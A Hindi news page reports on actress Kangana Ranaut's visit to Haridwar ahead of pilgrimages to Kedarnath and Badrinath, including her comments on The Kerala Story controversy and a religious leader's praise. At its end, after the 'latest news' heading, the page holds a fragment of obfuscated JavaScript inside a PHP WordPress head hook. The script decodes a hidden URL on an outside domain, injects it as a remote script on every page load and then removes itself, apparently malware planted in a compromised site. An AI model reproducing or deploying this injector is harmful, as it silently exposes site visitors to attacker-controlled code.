Saturday, July 27, 2024
spot_img

कंगना कल जाएगी बद्रीनाथ केदारनाथ के दर्शन करने।

बॉलीवुड अभिनेत्री कंगना रनोत धार्मिक यात्रा पर उत्तराखंड पहुंची हुई है अभिनेत्री कंगना रनोत ने निरंजनी अखाड़े के आचार्य महामंडलेश्वर कैलाशानंद गिरि का आशीर्वाद लिया और दक्षिण काली मंदिर में मां की पूजा अर्चना की कल कंगना रनोत केदारनाथ और बद्रीनाथ के दर्शन करेगी कुछ दिन पूर्व भी कंगना रनोत हरिद्वार बद्रीनाथ केदारनाथ के दर्शन करने पहुंची थी मगर मौसम खराब होने के कारण कंगना रनोत दर्शन नहीं कर पाई थी, आज हरिद्वार पहुंचने पर कंगना रनोत में अलग ही उमंग देखने को मिली क्योंकि कल कंगना रनोत केदारनाथ और बद्रीनाथ के दर्शन कर पाएगी। द केरला स्टोरी विवाद पर कंगना रनोत ने कहा सेंसर बोर्ड अगर किसी फिल्म को पास करता है तो उसका विरोध नहीं करना चाहिए इसे संविधान का अनादर होता है।
बॉलीवुड अभिनेत्री कंगना रनोत का कहना है कि पिछली बार मौसम खराब होने के कारण में केदारनाथ और बद्रीनाथ के दर्शन नहीं कर पाई थी आज मैं दोबारा बद्रीनाथ और केदारनाथ के दर्शन करने आई हूं में प्रार्थना करती हूं इस बार मुझे महादेव के दर्शन हो सके कंगना रनोत का कहना है कि हमारी सनातन परंपरा प्राचीन है हरिद्वार आकर पुण्य कमाने का मौका मिलता है।
द केरला स्टोरी को लेकर देशभर में चल रहे विवाद को लेकर कंगना रनोत का कहना है कि जिन फिल्मों को लोग देखना पसंद करते हैं उससे फिल्म इंडस्ट्री को फायदा ही होता है लोगों को बॉलीवुड फिल्म इंडस्ट्री से शिकायत रहती है जिस तरह की फिल्में वह देखना चाहते हैं वैसी फिल्में नहीं बनती जब इस तरह की फिल्में आती है तो लोगों की शिकायतें दूर हो जाती है मेरी आने वाली फिल्म इमरजेंसी को लोग ज्यादा से ज्यादा तादाद में देखें क्योंकि इस फिल्म में मुझे एक अलग ही एक्सपीरियंस हुआ है वही द केरला स्टोरी पर बैन लगाने की बात पर कंगना रनोत का कहना है कि जब सेंसर बोर्ड द्वारा किसी फिल्म को मान्यता दी जाती है तो उसका विरोध नहीं करना चाहिए इसे संविधान का अपमान होता है।
निरंजनी अखाड़े के आचार्य महामंडलेश्वर कैलाशानंद गिरी का कहना है कि बॉलीवुड अभिनेत्री कंगना रनोत ने आज हरिद्वार सिद्ध पीठ दक्षिण काली मंदिर पहुंचकर पूजा अर्चना की आज रात्रि विश्राम के बाद कल सुबह बद्रीनाथ और केदारनाथ के दर्शन करने जाएगी इनका कहना है कि आज के वक्त में सुपरस्टार लोगों के पास वक्त नहीं होता मगर उसके बावजूद भी कंगना रनोत सनातन परंपरा के लिए वक्त निकाल रही है और सनातन परंपरा की बात बिना डरे हुए बोलती है इनका कहना है कि जब देश के बड़े लोग जिनके फॉलोवर लाखों-करोड़ों में है वह अपने धर्म को मानने लगेंगे तो इसे धर्म को बढ़ावा मिलता है आज ऐसा देखने को मिल रहा है कि बड़े-बड़े स्टार मठ मंदिरों में दर्शन करने आ रहे हैं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>